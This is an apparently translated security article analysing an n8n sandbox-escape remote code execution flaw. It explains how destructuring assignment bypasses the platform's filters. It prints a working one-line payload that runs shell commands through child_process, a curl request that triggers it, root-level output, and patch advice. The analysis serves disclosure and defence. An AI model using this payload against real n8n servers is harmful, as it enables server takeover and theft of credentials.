A critical Remote Code Execution (RCE) vulnerability (CVE-2026-25049) has recently been discovered in the workflow automation platform n8n. This vulnerability, with a CVSS score of 9.4 (Critical), allows unauthenticated attackers to completely take control of the server through a public Webhook.

In particular, this vulnerability is technically very interesting because it bypasses 5 layers of security, including regular expressions, AST inspection, and runtime validation built by n8n, by using the grammatical characteristic of JavaScript's Destructuring Assignment.

In this article, we will analyze how this vulnerability occurred at the code level and examine the attack principle through PoC (Proof of Concept).

1. Background: n8n's Sandbox Defense System

n8n provides a feature that allows users to process data using JavaScript expressions. For example, expressions like {{ $json.name }} are executed internally in a manner similar to eval() or the Function constructor.

Naturally, this is a security risk, so n8n has built the following multi-layered defense:

Regex Check: Blocks strings containing dangerous keywords such as .constructor
AST Sanitizer: Analyzes the code's structure (AST) to block dangerous nodes (e.g., MemberExpression)
Runtime Validator: Checks object property access at runtime
Function Sanitizer: Binds the this context to an empty object in normal functions
Property Removal: Removes dangerous global objects such as eval and Function

At first glance, it seems like a perfect defense system. However, all these defenses were built on the flawed assumption that "object property access is only done through a dot (.) or brackets ([])".

2. Cause of Vulnerability: Destructuring

There are two main ways to get the properties of an object in JavaScript.

A. Traditional Method (Blocked)

obj.constructor      // Dot notation
obj['constructor']   // Bracket notation

These methods are parsed as MemberExpression nodes in the AST (Abstract Syntax Tree). n8n's AST Sanitizer was monitoring this node, and the regular expression filter also caught the .constructor pattern.

B. Destructuring (Bypass Successful)

const { constructor } = obj;

This is the destructuring assignment syntax introduced since ES6. This code is parsed as ObjectPattern within VariableDeclaration in the AST.

The problem is that n8n's security logic only checked MemberExpression and did not check ObjectPattern. In addition, the .constructor pattern did not appear in the source code text, so the regular expression filter could also be bypassed.

3. Exploit Chain Analysis

Simply getting the constructor is not enough. Attackers must use it to execute arbitrary code. The entire exploit chain is as follows:

Step 1: Secure `this` with an Arrow Function

n8n sandboxes normal functions (function() {}) by forcibly binding their this to an empty object. However, arrow functions (() => {}) do not have their own this binding, but use the this of the upper scope (Lexical Scope) as is.

(() => {
    // 샌드박스 처리되지 않은 원본 'this' 또는 문맥에 접근 가능
})()

Step 2: Acquire `Function` Constructor with Destructuring

Inside the arrow function, get the constructor of an empty function using destructuring assignment. In JavaScript, the constructor of all functions is the Function object. In other words, we are obtaining the Function constructor.

const { constructor } = () => {}; 
// constructor === Function

Step 3: Arbitrary Code Execution

Using the obtained Function constructor, create a function that can execute code as a string, and immediately execute it.

constructor('return process.mainModule.require("child_process").execSync("id").toString()')()

Final Payload

Combining all of this, the following one-line payload is completed.

={{(() => { 
    const {constructor} = ()=>{}; 
    return constructor('return process.mainModule.require("child_process").execSync("id").toString()')(); 
})()}}

4. PoC and Attack Scenario

This vulnerability is greatly amplified when combined with n8n's Webhook feature. This is because it is easy to create Webhooks with no authentication (Authentication: None) in n8n.

Attack Scenario

An attacker connects to the n8n instance (or induces it with CSRF, etc.) to create a malicious workflow.
Add a Webhook node and set the authentication to None.
Insert the above RCE payload into the expression field of a node (e.g., Set) connected behind the Webhook.
Activate the workflow.
When a request is sent to the corresponding Webhook URL from the outside, the command is executed on the server.

Actual Test (PoC)

# Webhook으로 요청 전송
curl -X POST 'http://target-n8n-server.com/webhook/rce-demo' \
 -H 'Content-Type: application/json' \
 --data '{}'

Response Result:

{
 "result": "uid=0(root) gid=0(root) groups=0(root)\n"
}

It can be confirmed that the server's id command is executed and has root privileges. Attackers can use this to steal environment variables (API Keys), install backdoors, penetrate the internal network, and perform all other actions.

5. Response and Patch

Patch Version

The n8n team identified this issue and immediately released a patch.

Fixed Version: 1.123.17, 2.5.2 or higher

Fundamental Solution

From a developer's perspective, this vulnerability shows the "limitations of blacklist-based security". Because JavaScript is such a flexible language, there is always the possibility of bypass if you only block certain syntax (dot notation, etc.).

Do not rely on Regex: Code should be analyzed with a parser, not with regular expressions.
Expand AST Coverage: You should check all AST nodes that allow property access, such as ObjectPattern as well as MemberExpression.
Apply Allowlist: If possible, it is safer to use a whitelist method that allows access only to allowed properties.

In conclusion

This CVE-2026-25049 is a textbook example of how the entire security can be compromised due to a single logical flaw (overlooking Destructuring), even with five layers of defense. If you are using n8n, please update to the latest version immediately.

Reference: SecureLayer7 Deep Dive

댓글